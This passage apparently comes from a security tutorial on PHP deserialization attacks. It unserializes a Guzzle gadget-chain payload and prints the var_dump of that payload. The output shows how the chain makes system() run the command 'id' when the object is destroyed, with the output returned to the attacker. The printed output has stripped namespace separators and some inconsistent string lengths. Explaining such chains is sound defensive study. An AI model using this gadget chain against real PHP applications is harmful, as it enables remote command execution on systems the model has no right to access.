To understand the payload more clearly, we can deserialize it and use var_dump on it. According to the PHP manual, var_dump displays structured information (including the type and value) about one or more expressions. Arrays and objects are explored recursively by var_dump, and values are indented to show structure. We could also use the print_r() function to perform the same operation:
Since we used the payload based on the GuzzleHttp client, we need to have Guzzle installed. We can unserialize it using the following PHP code:
<?php
require __DIR__ . '/vendor/autoload.php';
$obj= unserialize(json_decode(file_get_contents("./payload.txt")));
var_dump($obj);
?>
Running the code will give us the following output:
object(GuzzleHttpPsr7FnStream)#3 (2) {["methods":"GuzzleHttpPsr7FnStream":private]=>array(1) {["close"]=>array(2) {[0]=>object(GuzzleHttpHandlerStack)#2 (3) {["handler":"GuzzleHttpHandlerStack" :private]=>string(1) "id"["stack":"GuzzleHttpHandlerStack":private]=>array(1) {[0]=>array(1) {[0]=>string(4) "system"}}["cached":"GuzzleHttpHandlerStack" :private]=>bool(false)}[1]=>string(7) "resolve"}}["_fn_close"]=>array(2) {[0]=>object(GuzzleHttpHandlerStack)#2 (3) {["handler":"GuzzleHttpHandlerStack" :private]=>string(1) "id"["stack":"GuzzleHttpHandlerStack":private]=>array(1) {[0]=>array(1) {[0]=>string(4) "system"}}["cached":"GuzzleHttpHandlerStack" :private]=>bool(false)}[1]=>string(7) "resolve"}
This, when executed, causes the system() function to be executed with the command passed as an argument to this function, and the output is returned to us.